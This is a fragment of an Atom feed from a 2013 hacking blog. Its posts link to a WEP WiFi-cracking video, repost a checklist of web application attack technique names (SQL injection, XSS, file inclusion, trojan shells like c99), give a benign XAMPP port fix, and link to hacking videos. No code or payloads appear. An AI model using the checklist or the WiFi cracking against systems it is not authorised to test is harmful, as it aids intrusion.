term="network penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="network pentesting"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="wifi hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="wifi security"/><title type='text'>How To Crack A WEP Encypted Wifi Network (Wifi Hacking)</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-DcYRNSW5yu0/UUxd7vS4c8I/AAAAAAAAAGk/SUBHHwubdYg/s1600/wifi+hacking.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://2.bp.blogspot.com/-DcYRNSW5yu0/UUxd7vS4c8I/AAAAAAAAAGk/SUBHHwubdYg/s1600/wifi+hacking.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;A Very Superb Live video demo of cracking wep and hacking wifi network by S.O.G the member of Blackleets Team, So here is the video below i hope you will enjoy the video:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;object class=&quot;BLOGGER-youtube-video&quot; classid=&quot;clsid:D27CDB6E-AE6D-11cf-96B8-444553540000&quot; codebase=&quot;http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0&quot; data-thumbnail-src=&quot;http://3.gvt0.com/vi/qc4wFIYGSPM/0.jpg&quot; height=&quot;266&quot; width=&quot;320&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/qc4wFIYGSPM&amp;fs=1&amp;source=uds&quot; /&gt;&lt;param name=&quot;bgcolor&quot; value=&quot;#FFFFFF&quot; /&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot; /&gt;&lt;embed width=&quot;320&quot; height=&quot;266&quot;  src=&quot;http://www.youtube.com/v/qc4wFIYGSPM&amp;fs=1&amp;source=uds&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;If video not playing then here the here is the second link to youtube:&lt;/span&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Second Link Here:&lt;/span&gt; &lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;a href=&quot;http://adf.ly/K2Ad8&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/h2&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/6448201152684753502/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/03/how-to-crack-wep-encypted-wifi-network.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6448201152684753502'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6448201152684753502'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/03/how-to-crack-wep-encypted-wifi-network.html' title='How To Crack A WEP Encypted Wifi Network (Wifi Hacking)'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-DcYRNSW5yu0/UUxd7vS4c8I/AAAAAAAAAGk/SUBHHwubdYg/s72-c/wifi+hacking.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-6283297362317298977</id><published>2013-02-27T13:58:00.000+05:00</published><updated>2013-02-27T13:58:16.555+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="Pentesting"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking techniques"/><category scheme="http://www.blogger.com/atom/ns#" term="Web Penetration"/><category scheme="http://www.blogger.com/atom/ns#" term="Web Pentesting"/><category scheme="http://www.blogger.com/atom/ns#" term="web security"/><category scheme="http://www.blogger.com/atom/ns#" term="web server"/><title type='text'>Web Application Hacking All Techniques [Tags]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Well i found a very informative thing by an alboraaq user &quot;&lt;span style=&quot;color: magenta;&quot;&gt;SilverSurfer&lt;/span&gt;&quot;&lt;/span&gt; &lt;span style=&quot;color: red;&quot;&gt;for this Thread , totally credit goes to him,&amp;nbsp; And am putting the thread here. Ok in this thread all well known Web Application hacking techniques are mentioned . And just Tags (Not explanation) and this is very helpfull for all Web Ethical Hackers to know the all techniques and one thing that the guy (SilverSurfer) also mentioned is , if he missed any tag then&lt;/span&gt; &lt;span style=&quot;color: red;&quot;&gt;sorry and notify. So Here is the list below:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: magenta;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;This list below fits in category Parameter manipulation&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Arbitary File Deletion&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Code Execution&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cookie Manipulation ( meta http-equiv &amp;amp; crlf injection )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; CRLF Injection ( HTTP response splitting )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross Frame Scripting ( XFS )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross-Site Scripting ( XSS )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Directory traversal&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Email Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; File inclusion&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Full path disclosure&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; LDAP Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP code injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP curl_exec() url is controlled by user&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP invalid data type error message&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP preg_replace used on user input&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP unserialize() used on user input&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Remote XSL inclusion&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Script source code disclosure&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Server-Side Includes (SSI) Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; SQL injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; URL redirection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; XPath Injection vulnerability&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; EXIF&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;This list below fits in category MultiRequest parameter manipulation&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Blind SQL injection (timing)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Blind SQL/XPath injection (many types)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This list below fits in category File checks&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; 8.3 DOS filename source code disclosure&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Search for Backup files&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross Site Scripting in URI&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; PHP super-globals-overwrite&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Script errors ( such as the Microsoft IIS Cookie Variable Information Disclosure )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;This list below fits in category Directory checks&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross Site Scripting in path&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross Site Scripting in Referer&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Directory permissions ( mostly for IIS )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; HTTP Verb Tampering ( HTTP Verb POST &amp;amp; HTTP Verb WVS )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Possible sensitive files&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Possible sensitive files&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ******* fixation ( j*******id &amp;amp; PHPSESSID ******* fixation )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; WebDAV ( very vulnerable component of IIS servers )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;This list below fits in category Text Search Disclosure&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Application error message&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Check for common files&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Directory Listing&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Email address found&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Local path disclosure&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Possible sensitive files&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Microsoft Office possible sensitive information&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Possible internal IP address disclosure&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Possible server path disclosure ( Unix and Windows )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Possible username or password disclosure&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Sensitive data not encrypted&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Source code disclosure&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Trojan shell ( r57,c99,crystal shell etc )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; ( IF ANY )Wordpress database credentials disclosure&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;This list below fits in category File Uploads&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Unrestricted File Upload&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;This list below fits in category Authentication&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Microsoft IIS WebDAV Authentication Bypass&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; SQL injection in the authentication header&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Weak Password&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; GHDB - Google hacking database ( using dorks to find what google crawlers have found like passwords etc )&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;This list below fits in category Web Services - Parameter manipulation &amp;amp; with multirequest&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Application Error Message ( testing with empty, NULL, negative, big hex etc )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Code Execution&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; SQL Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; XPath Injection&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Blind SQL/XPath injection ( test for numeric,string,number inputs etc )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Stored Cross-Site Scripting ( XSS )&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Cross-Site Request Forgery ( CSRF )&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: magenta;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Credit Goes to &quot;SilverSurfer&quot;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;And soon when i will get time , i will try to explain some of these in my words. Regards &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/6283297362317298977/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/02/web-application-hacking-all-techniques.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6283297362317298977'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6283297362317298977'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/02/web-application-hacking-all-techniques.html' title='Web Application Hacking All Techniques [Tags]'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-6591529564151810342</id><published>2013-02-26T14:34:00.000+05:00</published><updated>2013-02-26T14:36:09.562+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="network"/><category scheme="http://www.blogger.com/atom/ns#" term="networking"/><category scheme="http://www.blogger.com/atom/ns#" term="server"/><category scheme="http://www.blogger.com/atom/ns#" term="web server"/><category scheme="http://www.blogger.com/atom/ns#" term="xamp"/><title type='text'>XAMP server problem apache and mysql not Sarting/Stoping [solved]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Well&amp;nbsp; 2 days ago i was having problem with xamp. My Mysql and apache was not running when i was clicking on start button on XAMP Contol panel. I was thinking that there might be some files missing. i deleted XAMP from my computer, then downloaded again but problem was still same.But 2 things helped me to solve this problem. let me share both with you this may help you. First check the snap shot below when i was trying to start Apache and mysql i was getting this messsage:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-DRchVwXov70/USpYJKfEudI/AAAAAAAAACs/KhBIxRGwJOA/s1600/Capture.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;289&quot; src=&quot;http://1.bp.blogspot.com/-DRchVwXov70/USpYJKfEudI/AAAAAAAAACs/KhBIxRGwJOA/s320/Capture.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;it was the same message that i was getting , first thing helped me i deleted all files from XAMP folder and downloaded this zip file and extracted all files in the same&amp;nbsp; folder and my both services MYSQL and APACHE was working and you can get that zip file from here&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;a href=&quot;http://adf.ly/JjzPn&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Extract all files in the same folder of XAMP.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;and start it again it will work.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;If Still Not Working or get the eror back after restarting computer then it must be the specific port is busy and another service is running on that port. which is by default are 443 and 80.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;see if there is another program working on that ports then change that program&#39;s port&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;you can use this command to see all the port running:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;blockquote class=&quot;tr_bq&quot;&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&quot;netstat -ano&quot;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;It will show windows something like this:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/-DYDuSiAd2nI/USx-CHglTmI/AAAAAAAAADQ/gXZnid02PEs/s1600/2664.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;151&quot; src=&quot;http://1.bp.blogspot.com/-DYDuSiAd2nI/USx-CHglTmI/AAAAAAAAADQ/gXZnid02PEs/s320/2664.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;on left hand in red lines you can see port number&#39;s and on right hand you can see pid&#39;s of program. every program which are running hiddenly in your computer have unique PID (Process identity number) which changes every time. Using this number you can see what program is running on that port just see on the same line&#39;s where specific port is . for example on the ab&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&amp;nbsp;above pic you will see on line number one and on port no &quot;80&quot; the program which is running has PID no &quot;2664&quot;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Now goto task manager &amp;gt;select subcategory &quot;services&quot; and see which service is running on that 2664 pid. See the pic :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-N4s11OyL7TM/USx-p8vLx3I/AAAAAAAAADY/9PntvnfkRO0/s1600/apache.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&amp;nbsp;&lt;img border=&quot;0&quot; height=&quot;311&quot; src=&quot;http://2.bp.blogspot.com/-N4s11OyL7TM/USx-p8vLx3I/AAAAAAAAADY/9PntvnfkRO0/s320/apache.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;it&#39;s apache running now.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;But if you have skype installed then skype uses &quot;80&quot; and &quot;443&quot; ports by defualt for incoming services so disable the skype for this and get the port 80 and 443 free. You Can do this by going into&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-sxitFAJb1PE/USx_54PLgtI/AAAAAAAAADk/twoX8c0Pij4/s1600/skype.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;256&quot; src=&quot;http://2.bp.blogspot.com/-sxitFAJb1PE/USx_54PLgtI/AAAAAAAAADk/twoX8c0Pij4/s320/skype.PNG&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Skype =&amp;gt; Tools =&amp;gt; Options =&amp;gt; Advance =&amp;gt; Connection and untick the line &quot;Use port 80 and 443&quot; . click save and restart skype as you can see the pic above.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;and then start your apache and mysql.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;and if your problem is APACHE and MYSQL neither staring Nor Stopping (When starts Then see the video link is below to youtube:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;Direct Link To Youtube:&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;a href=&quot;http://adf.ly/Jr9c3&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt;&amp;nbsp;&lt;/span&gt; &lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/6591529564151810342/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/02/xamp-server-problem-apache-and-mysql.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6591529564151810342'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/6591529564151810342'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/02/xamp-server-problem-apache-and-mysql.html' title='XAMP server problem apache and mysql not Sarting/Stoping [solved]'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' src='http://3.bp.blogspot.com/-dftCJdDmq4Y/UU3RmxS0HMI/AAAAAAAAAHE/kdCiuRew9IE/s220/images.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-DRchVwXov70/USpYJKfEudI/AAAAAAAAACs/KhBIxRGwJOA/s72-c/Capture.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3130564110394933894.post-4045520367686416738</id><published>2013-02-25T15:09:00.000+05:00</published><updated>2013-03-25T17:45:12.113+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="networking"/><category scheme="http://www.blogger.com/atom/ns#" term="penetration testing"/><category scheme="http://www.blogger.com/atom/ns#" term="Pentesting"/><category scheme="http://www.blogger.com/atom/ns#" term="security"/><category scheme="http://www.blogger.com/atom/ns#" term="video"/><category scheme="http://www.blogger.com/atom/ns#" term="Videos"/><category scheme="http://www.blogger.com/atom/ns#" term="web hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="web security"/><category scheme="http://www.blogger.com/atom/ns#" term="web server"/><title type='text'>10 More Hacking/security videos By Russian hackers</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Well i Hope you&#39;ve liked the first part of the hacking/ Security videos By &lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Russian Hackers, now this is the second part of that video series and it also contains 10 videos in it, am saying again that the videos is in Russian language but you will get the concept of the videos am pretty sure for this, And please dont take this blog in negative way. It&#39;s blog for security testers and you hacking tricks are also part of this. it&#39;s something like Black Hat Tricks for White Hat hackers so please use this knowledge in positive ways.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;Here is the direct Link below to download:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;h2 style=&quot;text-align: center;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: lime;&quot;&gt;&lt;a href=&quot;http://adf.ly/JmsuO&quot; target=&quot;_blank&quot;&gt;Click Me&lt;/a&gt;&amp;nbsp;&lt;/span&gt; &lt;/b&gt;&lt;/span&gt;&lt;/h2&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.blackleets.net/feeds/4045520367686416738/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blackleets.net/2013/02/10-more-hackingsecurity-videos-by.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/4045520367686416738'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3130564110394933894/posts/default/4045520367686416738'/><link rel='alternate' type='text/html' href='http://www.blackleets.net/2013/02/10-more-hackingsecurity-videos-by.html' title='10 More Hacking/security videos By Russian hackers'/><author><name>Blackleets</name><uri>http://www.blogger.com/profile/16410994504914391957</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='26' 